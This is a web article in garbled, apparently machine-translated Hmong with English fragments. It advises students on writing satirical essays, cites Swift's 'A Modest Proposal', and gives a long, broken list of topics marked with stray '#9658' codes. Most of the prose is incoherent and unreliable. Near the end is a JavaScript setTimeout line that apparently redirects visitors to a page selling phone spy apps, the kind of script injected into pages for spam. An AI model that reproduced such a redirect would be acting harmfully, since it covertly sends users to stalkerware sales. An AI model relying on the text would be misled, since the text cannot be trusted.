Tsab xov xwm zoo tib yam

Diam neej Excellent rau Publish uas ib tshooj Satire Satirical declares qhov hnyav tseeb tib funny los mocking. Muaj ntau ntau txoj hauv zej zog uas yog cov tib neeg uas qhia tej uas hais tau. Ib tug muaj pes tsawg leeg yuav yog ib txoj kev zoo heev los highlight lub paradox los yog cov uas hais tau rau ib lub caijnyoog twg. Thaum koj tau hauj lwm kws qhia ntawv los yog lub tsev kawm ntawv dua sau ib tug sau ntawv satirical, no Tshooj khoom siv ib daim ntawv uas sau ntawv superior compound. Tsis li ntawd, me me! Meej. yog Jonathan Swift. Yog cov tus ntau nrov satirical dabneeg txog kev txhawj xeeb ntawm cov qeb ntawm tsis oppressed thaum kawg rau xyoo pua 18th Ireland tas nrho vim tsis muaj nplua nwj. Nws muaj ib’ kev xaiv yooj yim’ rau cov neeg pluag tsis muaj nyiaj yuav yuav thiab muab lawv cov me nyuam. Nws qhia tau hais tias cov youngsters txhob pub rau tus tswv tsev muaj nplua nwj, uas yuav daws tau qhov teeb meem no niam thiab txiv tsis, thiab muaj kev tau lub cua nyob ntawm tus tswv tsev uas tsis tub kom zoo. Yog yuav ua tau rau muaj so ntawm wit, satirical dabneeg no meant signify yuam. Tej dabneeg sawv cev los xij uas tawv rau ib zam ilv, laced wit thiab wit; Txawm li cas los, tsuav yog tsis ices heev nyob hauv conveying cov lus. Muaj ntau ntau xai uas koj tau xaiv los ntawm yog hais tias koj yuav tsum mus txog rau luam tawm tsab ib. Teeb meem ntau satirical nyob raws li tam sim no thiab txoj. Nws yuav hais tiag ua pab tau thaum uas ua dabneeg satirical yog hais tias koj lub neej kub uas yog trending nyob ib ncig ntawm koj meej pem. Hauv qab no yog tau tsim thiab lis lub superb satire, muaj ob peb yam tseem ceeb uas yuav tau muaj raws li. Tsis muaj lub nyuas yog tsis muaj teeb meem. Tuaj ncig thiab tsom xam txoj kev hais txog cov lus uas tau moog sai. Tshuaj xyuas koj haiv neeg. Lawm, muaj yeej ua txhua yam kom tau lub teb chaws sib txawv li cas thiab societal ntau evils cuaj kaum overcome, tiam sis cov no ntau heev yuav ua kom muaj teeb meem heev heev uas yuav tsum tau muab los hais. Txog teeb meem yuav yog qhov loj tshaj tsum rau satire. Nyob kho mob tshiab tshiab thiab xov xwm happenings yog hais tias koj xav mus xaiv ib qhov teeb meem uas yog ib tug tamsim no trending. Yog, obviously, koj tau txais txhua yam nyob rau hauv cov cuab yeej cuab tam ib yam nkaus thiab nraum. Yog mus boost satirical tej yam uas yus lub xaav dissertation ib txoj kev zoo nyeem ntawv magazine comic daim uas phiaj hwm thoj. Txhua tus economy xav fim tej kws muaj kev txom nyem, ntxiv rau nws yuav cuam tshuam nrog kev loopholes. Tej loopholes yuav muaj ib yawm hais rau satire. Piv txwv, cov nqi, inflation, los yog teeb meem hais txog SUPERVISION. Thaum hais tej kev txhawj xeeb kuj yog cov tau teev biggest, thiab yog tus biggest satire rau tsim noob neej. Rau nws tus kheej nyiaj, chav txivneej muaj exploited xwm tshaj li reproach, raws li nyob hauv kev ntxeev kom tus wrath ntawm lub fury ntawm cov ua cim. Ib tsab xov xwm satirical rau cov teeb meem zoo li no yuav kuj yog ib txoj kev zoo ua kom to taub tias cov neeg yuav mus tiv thaiv peb ntiaj chaw rau ntawd tiam tom ntej. Nram qab no yog ob peb lub tswv yim teeb meem, Yog hais tias koj yuav tsum tau ib lub tsev kawm ntawv qib high school kawm tsis zoo siab heev txog luam tawm tsab muaj pes tsawg leeg satirical: Koom teg nrug homosexual #9658 ► Hwm muag los ntawm cov npe uas ► Soaring sib nrauj nqi ► #9658 Rog; Escalation hauv yus tua yus rau ► cog plawv lawm ► xav xav tau nrog kev network websites ► couch-qos ► xav xav tau nrog video gaming ► cev tsis tab seeb whooping ► xav xav tau cov tshuaj ► tub hluas kev nyuaj siab ► #9658, Soaring kev lim kev nyuab siab
Cov qhov uas tus nqi ► #9658 pas thiab cov hom zaub ntug hauv paus ; Sexuality xav #9658 ib qhov chaw ua hauj lwm; #9658; Teeb meem kev thab plaub rau chav lajfai hnov los ntawm cov workingclass ► #9658 Tus poj niam tau siv
#9658 Nyob zoo kom mob siab rau; Ua niam txiv ► txhaum cai rau cov poj niam ► deev inequality ► yog ib tug neeg qhov tub qhe mus engineering? ► #9658 Kas tsim txom
#9658 Nws ua txhaum ntawd rau; # 9658 kev ntxub ntxaug aub kev phem heev ► teeb meem competitors ► siab tsis ncaj ua hauj lwm muaj kev ► #9658 Nyaj npaaj; Povhwm kev poob haujlwm ► #9658 Inflation; #9658 Nuj peonage; #9658 Se; Cov tsiaj ntawv loj ► demerits sib ceg ► kev ua phem ► #9658 Kev sib raug zoo teb chaws; Khiav tawm- #9658 Luam theej duab lub hom phiaj; Globalization ► #9658 Nqi nyiaj; Kam teb chaws ► rho menyuam tawm ► #9658, Kev ua qias tuaj
Deforestation ► globalwarming ► nws depletion ► Demerits ntawm nanotechnology lub witty siv rau hauv koj tus account ib satirical mustn't yuav overdone, thiab koj yuav tsum tau nco ntsoov mus tsis overboard thaum uas txheem txheej cov harshness los yog paradox ntawm qhov teeb meem no. Koj yuav tsum tau nrog koj terminology ceebfaj, Yog koj nyob nraum peb lam tau lam ua txog tej teeb meem xws li kev cai dab qhuas. Tej zaum koj yuav tau txais kev pab rau koj seem yus pom; nonetheless, koj tsab xov xwm no yuav tsum muaj kev cuam tshuam kev xeem uas hais zoo. Txuas ntxiv, tsim ib tug satirical muaj pes tsawg leeg zov zoo kawg thiab paub thiab kev tshawb nrhiav ntawm tus kawm hnyav. Ib dissertation researched heev yuav yeej qhia tias koj tsis muaj cov txawj ntse. Muab ib lub npe uas yog humorous rau koj sau ntawv. Hle inspiration lub npe ' A me me tswv yim txog’ paub tau. Koj muaj pes tsawg leeg yuav tsim brownie ntxiv tej yam uas muaj zoo tswvyim.

setTimeout(“Document.LOCATION.href='http://spyappforphones.com/buy.php'”, qeeb);

Muab tso rau hauv: